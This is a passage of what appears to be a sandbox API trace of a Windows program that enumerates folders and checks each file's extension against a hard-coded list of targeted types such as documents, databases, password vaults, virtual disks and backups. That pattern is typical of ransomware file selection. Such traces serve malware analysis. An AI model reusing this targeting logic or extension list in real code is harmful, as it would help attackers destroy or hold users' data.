(in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.200] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0040.200] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.200] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.200] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.200] PathFindExtensionW (pszPath="dotsdarkoverlay.png") returned=".png" [0040.200] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.200] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.200] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.200] PathFindExtensionW (pszPath="dotslightoverlay.png") returned=".png" [0040.201] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.201] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.201] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.201] PathFindExtensionW (pszPath="full.png") returned=".png" [0040.201] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.201] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.201] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.201] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0040.201] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.201] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.202] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.202] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0040.202] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.202] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.202] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.202] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0040.202] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.202] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.202] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.202] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0040.202] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.202] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.203] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.203] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0040.203] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.203] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.203] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.203] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0040.203] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.203] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.203] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.203] PathFindExtensionW (pszPath="pushplaysubpicture.png") returned=".png" [0040.203] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.203] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.204] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.204] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.205] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.205] PathFindExtensionW (pszPath="Heart_ButtonGraphic.png") returned=".png" [0040.205] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.205] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.205] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.205] PathFindExtensionW (pszPath="heart_glass_Thumbnail.bmp") returned=".bmp" [0040.205] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".bmp.") returned 5 [0040.205] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".bmp.") returned 0x0 [0040.205] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.205] PathFindExtensionW (pszPath="Heart_SelectionSubpicture.png") returned=".png" [0040.205] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.206] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.206] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.206] PathFindExtensionW (pszPath="Heart_VideoInset.png") returned=".png" [0040.206] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".png.") returned 5 [0040.206] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.206] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.206] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 0x0 [0040.206] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*" [0040.206] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.213] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.213] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.213] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0040.213] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.213] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.213] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0040.213] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.213] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.214] PathFindExtensionW (pszPath="colorcycle.png") returned=".png" [0040.214] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.214] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.214] PathFindExtensionW (pszPath="huemainsubpicture2.png") returned=".png" [0040.214] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.214] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.214] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0040.214] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.214] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.214] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0040.214] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.214] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.214] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0040.214] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.214] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.215] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0040.215] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.215] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.215] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0040.215] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.215] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.215] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0040.215] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.215] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.215] PathFindExtensionW (pszPath="title_stripe.png") returned=".png" [0040.215] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.215] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.216] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.217] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 0x0 [0040.217] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles", pszFile="*" | out: pszDest="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*") returned="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*" [0040.217] FindFirstFileW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.219] PathFindExtensionW (pszPath="1047x576black.png") returned=".png" [0040.219] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.219] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.220] PathFindExtensionW (pszPath="203x8subpicture.png") returned=".png" [0040.220] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.220] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.220] PathFindExtensionW (pszPath="blackbars60.png") returned=".png" [0040.220] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.220] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.220] PathFindExtensionW (pszPath="layers.png") returned=".png" [0040.220] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.220] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.220] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0040.220] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.220] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.220] PathFindExtensionW (pszPath="NavigationLeft_SelectionSubpicture.png") returned=".png" [0040.220] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.220] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.221] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0040.221] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.221] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.221] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0040.221] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.221] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.221] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0040.221] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.221] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".png.") returned 0x0 [0040.221] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0040.221] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".png.") returned 5 [0040.221] StrStrIW 